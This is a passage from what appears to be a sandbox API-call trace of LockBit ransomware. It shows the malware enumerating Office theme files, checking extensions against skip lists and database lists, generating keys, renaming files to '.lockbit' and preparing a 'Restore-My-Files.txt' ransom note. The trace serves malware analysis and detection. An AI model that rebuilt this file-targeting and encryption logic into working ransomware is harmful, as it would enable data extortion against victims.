(normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0185.798] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.798] malloc (_Size=0x40068) returned 0x3d70450 [0185.798] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=69784) returned 1 [0185.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0185.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0185.800] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.802] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.802] malloc (_Size=0xa8) returned 0x1fa2ed8 [0185.803] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0185.804] free (_Block=0x1fa2ed8) [0185.804] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.804] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.804] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda5e100, ftCreationTime.dwHighDateTime=0x1cbded8, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfda5e100, ftLastWriteTime.dwHighDateTime=0x1cbded8, nFileSizeHigh=0x0, nFileSizeLow=0x3f427, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apex.thmx", cAlternateFileName="APEX~1.THM")) returned 1 [0185.804] lstrcmpiW (lpString1=".", lpString2="Apex.thmx") returned -1 [0185.804] lstrcmpiW (lpString1="..", lpString2="Apex.thmx") returned -1 [0185.804] PathFindExtensionW (pszPath="Apex.thmx") returned=".thmx" [0185.804] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.804] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.804] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.805] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.806] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.806] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apex.thmx") returned 1 [0185.806] lstrcmpiW (lpString1="ntldr", lpString2="Apex.thmx") returned 1 [0185.807] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apex.thmx") returned 1 [0185.807] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apex.thmx") returned 1 [0185.807] lstrcmpiW (lpString1="autorun.inf", lpString2="Apex.thmx") returned 1 [0185.807] lstrcmpiW (lpString1="thumbs.db", lpString2="Apex.thmx") returned 1 [0185.807] lstrcmpiW (lpString1="iconcache.db", lpString2="Apex.thmx") returned 1 [0185.807] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.807] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx") returned=".thmx" [0185.807] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.807] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.807] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.808] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.808] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.lockbit") returned 71 [0185.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0185.814] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.814] malloc (_Size=0x40068) returned 0x3f70048 [0185.814] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=259111) returned 1 [0185.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0185.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0185.816] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.818] malloc (_Size=0xa4) returned 0x1fa2ed8 [0185.818] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0185.819] free (_Block=0x1fa2ed8) [0185.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.819] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.820] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd43200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3cd43200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x15a56, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apothecary.thmx", cAlternateFileName="APOTHE~1.THM")) returned 1 [0185.820] lstrcmpiW (lpString1=".", lpString2="Apothecary.thmx") returned -1 [0185.820] lstrcmpiW (lpString1="..", lpString2="Apothecary.thmx") returned -1 [0185.820] PathFindExtensionW (pszPath="Apothecary.thmx") returned=".thmx" [0185.820] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.820] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.821] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.821] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="ntldr", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="autorun.inf", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="thumbs.db", lpString2="Apothecary.thmx") returned 1 [0185.822] lstrcmpiW (lpString1="iconcache.db", lpString2="Apothecary.thmx") returned 1 [0185.822] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.822] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx") returned=".thmx" [0185.822] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.822] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.822] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.823] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.823] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.lockbit") returned 77 [0185.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0185.829] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.829] malloc (_Size=0x40068) returned 0x3df0008 [0185.829] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=88662) returned 1 [0185.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0185.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0185.831] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.834] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.834] malloc (_Size=0xb0) returned 0x1fa2ed8 [0185.834] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0185.835] free (_Block=0x1fa2ed8) [0185.835] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.835] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.836] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.836] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1396800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1396800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x109e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspect.thmx", cAlternateFileName="ASPECT~1.THM")) returned 1 [0185.836] lstrcmpiW (lpString1=".", lpString2="Aspect.thmx") returned -1 [0185.836] lstrcmpiW (lpString1="..", lpString2="Aspect.thmx") returned -1 [0185.836] PathFindExtensionW (pszPath="Aspect.thmx") returned=".thmx" [0185.836] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.836] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.837] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.837] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".ico", 